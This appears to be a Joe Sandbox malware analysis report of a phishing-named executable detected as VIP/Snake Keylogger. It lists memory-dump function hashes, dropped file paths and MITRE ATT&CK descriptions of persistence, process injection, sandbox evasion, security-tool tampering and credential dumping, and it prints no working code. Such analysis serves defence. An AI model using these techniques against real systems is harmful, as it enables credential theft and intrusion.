Instruction Fuzzy Hash: AD41D4B4E01248CBEF18DFAAD5546DEBBF2AF89304F20D12AC419BB255EB355946CF01

Function 04465D78 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4c19721d16ac2c60c8ca4561a419793848c09511613bba4861bbf726f878eb
Instruction ID: 229f94978539effc28dda9979fc6a2ee3d048cdaecda179f3fea49fd081a8782
Opcode Fuzzy Hash: 2b4c19721d16ac2c60c8ca4561a419793848c09511613bba4861bbf726f878eb
Instruction Fuzzy Hash: E241F370E012489BEF18DFBAD5546DEBBF2AF89300F24D02AC419AB255DB355946CF01

Function 04463F0F Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e13f12ce2e5c959497cad95a47e61f1e7e3ec3d229f422578b228fbf4d76a8a
Instruction ID: 8a0924d918f0d418252f38e7a17ad153fc57479af4573f41c90f27bdce5ad876
Opcode Fuzzy Hash: 9e13f12ce2e5c959497cad95a47e61f1e7e3ec3d229f422578b228fbf4d76a8a
Instruction Fuzzy Hash: 6A410270E01248CBEF18DFBAC9546DEBBF2AF88300F20D12AC419AB255DB355946CF15

Function 0446D321 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127963e028074ecde943e25ab2dcf96431d4cc43c0bf03f2cc4687d7f97ae2ec
Instruction ID: 787a82e08748f0c73dcd7a42fcac910e5a02124b59a23dfb12dcb48b83b53558
Opcode Fuzzy Hash: 127963e028074ecde943e25ab2dcf96431d4cc43c0bf03f2cc4687d7f97ae2ec
Instruction Fuzzy Hash: 7E41E3B4E01208CBEB18DFAAD5546DEFBF2BF89300F24D12AC419AB255EB345946CF51

Function 04469EA1 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb7243b4e25d1d4c961c5983174364aa1e8234262c920420b0cb0ae5cf92dcf
Instruction ID: 39aa45888e258668ecbe18b8ba78b5fb08f2a663b283bf1751573396d57c468d
Opcode Fuzzy Hash: ffb7243b4e25d1d4c961c5983174364aa1e8234262c920420b0cb0ae5cf92dcf
Instruction Fuzzy Hash: CE41E2B0E016488BEF18DFAAC5546DEFBF2AF89300F20C12AC419BB259DB355946CF01

Function 0446CA72 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5b0edc0ad3ba6e8f0d06b08f6e1316a46b7a6bd5555545551ec12c351734d2d
Instruction ID: a6e676241a05d896613a1adade6717a4202c87cfad1a1c2a3a35efb85a02926b
Opcode Fuzzy Hash: d5b0edc0ad3ba6e8f0d06b08f6e1316a46b7a6bd5555545551ec12c351734d2d
Instruction Fuzzy Hash: B341F574E012488FEF18DFBAD9546DEBBF2AF89300F20D12AC419AB295DB345946CF41

Function 0446EA12 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492e9123dd744cf8b2b2214eeedfd2c5a235a0aa8d0ef35bb8769ada35eb5e3e
Instruction ID: 5fbefa63687169d0878bc245d463b3b758549c4d67d4618a8017648b8df81d0a
Opcode Fuzzy Hash: 492e9123dd744cf8b2b2214eeedfd2c5a235a0aa8d0ef35bb8769ada35eb5e3e
Instruction Fuzzy Hash: 3E41DF74E01248CFEB18DFAAD5546EEBBF2AF88300F24D02AC419AB255EB355946CF11

Function 0446A751 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892435d48cfa10ff31d724f50c07358c9326b08470a20878aa9d29783ab60510
Instruction ID: 7cbadbc084bd66c56d28fdacca56bca364665ccba523e6af49650029c8fa3b31
Opcode Fuzzy Hash: 892435d48cfa10ff31d724f50c07358c9326b08470a20878aa9d29783ab60510
Instruction Fuzzy Hash: 0841D4B0E016088BEB18DFAAC54469EFBF2AF89300F24D12AC419BB255EB345946CF51

Function 044607B8 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6100030edcddfe326759761ce1550755bb9cf0f1d3fe6b7ca5d346191cb4fbea
Instruction ID: 5c47c6ce8d4a90f4aca9dcbf8a5f0df11ae6d9283d05a73d6fe23822dbbb7b6d
Opcode Fuzzy Hash: 6100030edcddfe326759761ce1550755bb9cf0f1d3fe6b7ca5d346191cb4fbea
Instruction Fuzzy Hash: 2E3128B1E016189BEB18CFAAD9847CDFBF2BF88314F14C12AD419A7290DB745546CF10

Function 044D0540 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1666b4cee11198987ce6f3392d3412007e60131604786dedf5fb43d4b11068c
Instruction ID: 25ec1b5247e609e92f9a7273fc34ab0356056edad421e52d831138e10a26c11a
Opcode Fuzzy Hash: a1666b4cee11198987ce6f3392d3412007e60131604786dedf5fb43d4b11068c
Instruction Fuzzy Hash: D331E274E012088BDF18DFAAC9506DEBBF2AF89304F24902AC418BB354EB356942CF55

Function 044D02B8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085471dcf6ec7d6b860a3c4d06d13367fdb23b01e3cfd0efaaa4988f3981880c
Instruction ID: 1e5b2805c01bd64d8b7702c6ac380384685e619802935cfae3a30612d340fa7d
Opcode Fuzzy Hash: 085471dcf6ec7d6b860a3c4d06d13367fdb23b01e3cfd0efaaa4988f3981880c
Instruction Fuzzy Hash: 0C31E274E012088FDF08DFAAD5546EEFBF2AF89304F24D02AC418AB255EB356942CF51

Function 06A9EBE0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 06A9EBF6
\;]q, xrefs: 06A9EC12
\;]q, xrefs: 06A9EBEC
\;]q, xrefs: 06A9EC1E

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 6d9e06b6788e5fc2f4350d53128057be6427398416cfc2288a40ce1784e381b9
Instruction ID: be3acd660d85c511409dfa2c5a51959bd61a29ad767f83ba66a734506145c49a
Opcode Fuzzy Hash: 6d9e06b6788e5fc2f4350d53128057be6427398416cfc2288a40ce1784e381b9
Instruction Fuzzy Hash: A3015E71B501158FDFA8EB2DC4849267BEABF88A617354569E485CF362DA20EC41C7E0

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SNgtfGzYQ.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhzanbuj.0z0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lumaheah.wdo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qx53ppw1.b3d.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzdefmss.4lp.ps1

C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp

C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe

C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe:Zone.Identifier

Static File Info

General

Windows Analysis Report
Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Function 073D8710 Relevance: 8.5, Strings: 6, Instructions: 1029
COMMON

Function 073D13E4 Relevance: 6.9, Strings: 5, Instructions: 647
COMMON

Function 044DB4A2 Relevance: 4.9, Strings: 3, Instructions: 1101
COMMON

Function 044DC9AA Relevance: 3.6, Strings: 2, Instructions: 1108
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre